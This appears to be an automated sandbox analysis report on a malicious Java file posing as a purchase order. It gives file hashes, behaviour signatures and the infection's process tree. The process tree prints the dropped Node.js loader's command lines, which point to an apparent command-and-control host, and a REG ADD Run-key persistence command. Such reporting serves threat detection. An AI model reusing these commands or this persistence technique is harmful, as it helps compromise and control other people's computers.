Analysis
-
max time kernel
134s -
max time network
147s -
platform
windows10_x64 -
resource
win10 -
submitted
30-06-2020 13:49
Static task
static1
Behavioral task
behavioral1
Sample
purchase_order_june2020.jar
Resource
win7v200430
Behavioral task
behavioral2
Sample
purchase_order_june2020.jar
Resource
win10
General
-
Target
purchase_order_june2020.jar
-
Size
12KB
-
MD5
072a7dde70bb530505d079fa0e58f5b3
-
SHA1
17ecf45e01685a6eb6f664984774f0e393136962
-
SHA256
d19e6201d033366ca89123177f5e53904f06f043dca06d162578920e064e34f2
-
SHA512
bbce409bcb919193c0a00699f154246b7d1f46ab0bd6014b06ab0bbb29a2a45563897ee41d53f20efd7e1360ccce3f637bb77814d18b492477d201d3101e90dd
Malware Config
Signatures
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 12 wtfismyip.com 11 wtfismyip.com -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
java.exenode.execmd.exedescription pid process target process PID 716 wrote to memory of 3804 716 java.exe node.exe PID 716 wrote to memory of 3804 716 java.exe node.exe PID 3804 wrote to memory of 3824 3804 node.exe cmd.exe PID 3804 wrote to memory of 3824 3804 node.exe cmd.exe PID 3824 wrote to memory of 3368 3824 cmd.exe reg.exe PID 3824 wrote to memory of 3368 3824 cmd.exe reg.exe PID 3804 wrote to memory of 3356 3804 node.exe node.exe PID 3804 wrote to memory of 3356 3804 node.exe node.exe -
Executes dropped EXE 2 IoCs
Processes:
node.exenode.exepid process 3804 node.exe 3356 node.exe -
Loads dropped DLL 4 IoCs
Processes:
node.exepid process 3356 node.exe 3356 node.exe 3356 node.exe 3356 node.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
node.exepid process 3356 node.exe 3356 node.exe -
Adds Run entry to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-335ea990 = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-335ea990.cmd\"" reg.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
node.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\purchase_order_june2020.jar1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:2642@qhub-subscription.store.qua.one --register-startup --central-base-url https://nanatools.ddns.net2⤵
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-335ea990" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-335ea990.cmd\"""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-335ea990" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-335ea990.cmd\""4⤵
- Adds Run entry to start application
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exeC:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:2642@qhub-subscription.store.qua.one --register-startup --central-base-url https://nanatools.ddns.net3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Checks processor information in registry
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js
-
C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js
-
\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\ffi-napi\prebuilds\win32-x64\node.napi.node
-
\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\native-reg\prebuilds\win32-x64\node.napi.node
-
\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\ref-napi\prebuilds\win32-x64\node.napi.node
-
\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\sqlite3\lib\binding\node-v79-win32-x64\node_sqlite3.node
-
memory/3356-118-0x0000000000000000-mapping.dmp
-
memory/3356-120-0x000001BE27B40000-0x000001BE27B41000-memory.dmpFilesize
4KB
-
memory/3368-117-0x0000000000000000-mapping.dmp
-
memory/3804-112-0x0000000000000000-mapping.dmp
-
memory/3804-114-0x0000023BE3380000-0x0000023BE3381000-memory.dmpFilesize
4KB
-
memory/3824-116-0x0000000000000000-mapping.dmp